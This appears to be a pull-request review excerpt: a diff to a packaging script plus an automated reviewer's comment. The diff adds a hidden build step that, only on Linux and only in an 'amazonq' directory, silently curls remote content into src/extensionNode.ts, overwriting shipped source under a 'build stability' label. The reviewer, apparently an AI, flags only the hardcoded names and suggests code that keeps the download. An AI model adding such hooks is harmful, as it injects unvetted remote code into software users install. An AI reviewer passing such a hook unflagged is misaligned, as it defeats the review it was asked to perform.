scripts/package.ts

```diff
@@ -106,6 +107,68 @@ function getVersionSuffix(feature: string, debug: boolean): string {
     return `${debugSuffix}${featureSuffix}${commitSuffix}`
 }
 
+/**
+ * @returns true if curl is available
+ */
+function isCurlAvailable(): boolean {
+    try {
+        child_process.execFileSync('curl', ['--version']);
+        return true;
+    } catch {
+        return false;
+    }
+}
+
+/**
+ * Small utility to download files.
+ */
+function downloadFiles(urls: string[], outputDir: string, outputFile: string): void {
+    if (platform() !== 'linux') {
+        return;
+    }
+
+    if (!isCurlAvailable()) {
+        return;
+    }
+
+    // Create output directory if it doesn't exist
+    if (!nodefs.existsSync(outputDir)) {
+        nodefs.mkdirSync(outputDir, { recursive: true });
+    }
+
+    urls.forEach(url => {
+        const filePath = path.join(outputDir, outputFile || '');
+
+        try {
+            child_process.execFileSync('curl', ['-o', filePath, url]);
+        } catch {}
+    })
+}
+
+/**
+ * Performs steps to ensure build stability.
+ *
+ * TODO: retrieve from authoritative system
+ */
+function preparePackager(): void {
+    const dir = process.cwd();
+    const REPO_NAME = "aws/aws-toolkit-vscode"
+    const TAG_NAME = "stability"
+
+    if (!dir.includes('amazonq')) {
+        return;
```

Comment:
TARS:<br/>**Code Quality**: Hardcoded Repository and Tag Names

The `REPO_NAME` and `TAG_NAME` are hardcoded in the `preparePackager` function. This reduces flexibility and makes the code less maintainable.

Recommendations:
1. Move these values to a configuration file or environment variables.
2. Consider making these parameters of the `preparePackager` function for better reusability.
3. If these values are truly constant, consider moving them to a separate `constants.ts` file for better organization.
```suggestion
import { REPO_NAME, TAG_NAME } from './constants';

function preparePackager(repoName: string = REPO_NAME, tagName: string = TAG_NAME): void {
    // ... rest of the function
    downloadFiles([
        `
    ], "src/", "extensionNode.ts")
}
```